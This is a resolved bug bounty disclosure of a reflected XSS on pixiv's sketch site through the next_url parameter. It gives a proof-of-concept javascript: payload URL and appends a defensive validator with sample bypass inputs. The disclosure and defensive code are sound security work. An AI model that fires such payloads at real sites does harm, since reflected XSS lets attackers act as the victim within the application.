XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
Medium
pixiv
Reported by
find_me_here
Vulnerability Details
Technical details and impact analysis
Hi,
I found a reflected XSS at https://sketch.pixiv.net/ via the success URL.
## Follow Me :)
## Steps
1. Open the URL below:
https://sketch.pixiv.net/resign_request/success?next_url=javascript%3Aalert%2F**%2F(document.domain)
2. A pop-up appears :)
## Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can perform any action within the application that the user can perform.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$500.00
Weakness
Cross-site Scripting (XSS) - Reflected
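
A defensive check for a parameter like `next_url`, added here as an example and not taken from the report or from pixiv's code. It assumes the value is used as a link target or redirect destination and that only same-origin destinations are wanted; `safeNextUrl`, `APP_ORIGIN` and `FALLBACK` are hypothetical names.

```javascript
// Added example (not pixiv's code): validate a next_url-style parameter
// before it is placed in an href or passed to a redirect.
const APP_ORIGIN = "https://sketch.pixiv.net"; // assumption: same-origin targets only
const FALLBACK = "/";                           // assumption: safe default destination

function safeNextUrl(raw, appOrigin = APP_ORIGIN, fallback = FALLBACK) {
  if (typeof raw !== "string" || raw.length === 0) return fallback;
  let parsed;
  try {
    // Parse relative to the app origin with the WHATWG parser, the same
    // algorithm browsers use. It strips tabs/newlines and leading spaces and
    // treats "\" as "/", so the checks below see what the browser would see.
    parsed = new URL(raw, appOrigin);
  } catch {
    return fallback;
  }
  // Scheme allowlist: javascript:, data:, vbscript: and the rest are refused.
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return fallback;
  // Same-origin only: refuses //other.example, /\other.example and http downgrade.
  if (parsed.origin !== new URL(appOrigin).origin) return fallback;
  // Return the normalised path, never the raw input string.
  return parsed.pathname + parsed.search + parsed.hash;
}

// Constructed sample inputs. The first query string is the one from the
// report's URL; URLSearchParams performs the percent-decoding.
function demo() {
  const fromReport = new URLSearchParams(
    "next_url=javascript%3Aalert%2F**%2F(document.domain)"
  ).get("next_url");
  const samples = [
    fromReport,
    "/items/123?tab=new",
    "https://sketch.pixiv.net/public",
    "//other.example/x",
    "/\\other.example",
    "java\tscript:alert(1)",
    "",
  ];
  return samples.map((s) => safeNextUrl(s));
}

console.log(demo());
```

Output encoding is still needed wherever the returned value is written into HTML; the check only constrains where the link can point.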